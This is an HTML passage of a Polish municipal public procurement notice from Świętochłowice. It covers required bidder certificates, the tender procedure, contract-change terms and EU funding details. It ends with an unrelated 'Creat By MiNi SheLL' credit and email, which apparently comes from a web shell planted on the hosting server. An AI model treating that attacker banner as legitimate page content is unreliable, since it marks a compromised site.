<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełniony i podpisany  formularz ofertowy  (treść formularza zamieszczona w załączniku nr 1),
2. oświadczenie o części zamówienia, której wykonanie, Wykonawca zamierza powierzyć podwykonawcom 
(w treści formularza ofertowego  pkt 4 ) w przypadku powierzenia przez Wykonawcę części zamówienia podwykonawcom,
3. pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarciu umowy, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy (dotyczy również wspólników spółki cywilnej),
4. pełnomocnictwo do występowania w imieniu Wykonawcy, w przypadku gdy dokumentów składających się na ofertę nie podpisuje osoba uprawniona do reprezentowania Wykonawcy zgodnie z odpisem z Krajowego Rejestru Sądowego lub Wykonawca  w przypadku osób fizycznych.
5. informację o  przynależności do grupy kapitałowej składanej w trybie art.26 ust.2d ustawy (wzór informacji o  przynależności do grupy kapitałowej składanej w trybie art.26 ust.2d ustawy zamieszony w załączniku nr 4)
W przypadku, gdy ofertę składa kilka podmiotów działających wspólnie dotyczy to każdego z nich.
6. jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach  innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający, w celu oceny, czy wykonawca będzie  dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy  stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, wymaga przedstawienia dokumentów określających zakres dostępnych wykonawcy zasobów innego podmiotu, sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem, zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy, polegającej na zmianie osób wchodzących w skład zespołu odpowiedzialnego za wykonanie przedmiotu umowy wyłącznie w przypadku wystąpienia obiektywnych i niezawinionych przez Wykonawcę okoliczności takich jak np. długotrwała choroba,  śmierć, utrata uprawnień.
W przypadku zmiany osób, zgoda może zostać udzielona, pod warunkiem zapewnienia przez Wykonawcę nowych osób, którzy posiadają wykształcenie, doświadczenie i kwalifikacje co najmniej takie same jak osoby nimi zastępowane, wskazane w ofercie.
Zamawiający przewiduje możliwość zmiany podwykonawców na zasoby, których powoływał się Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu, pod warunkiem, że  proponowany inny podwykonawca lub sam Wykonawca samodzielnie spełnia  warunki udziału w postępowaniu w stopniu nie mniejszym niż dotychczasowy podmiot (podwykonawca).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.swietochlowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świętochłowicach ul. Katowicka 54, 41 - 600 Świętochłowice Wydział Zamówień Publicznych..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2014 godzina 10:00, miejsce: Urząd Miejski w Świętochłowicach ul. Katowicka 54, 41 - 600 Świętochłowice Wydział Zamówień Publicznych pokój 115-116..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Zintegrowane podejście do problemów obszarów funkcjonalnych na przykładzie Chorzowa, Rudy Śląskiej i Świętochłowic, współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Pomoc Techniczna 2007-2013 i budżetów miast - Partnerów projektu..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com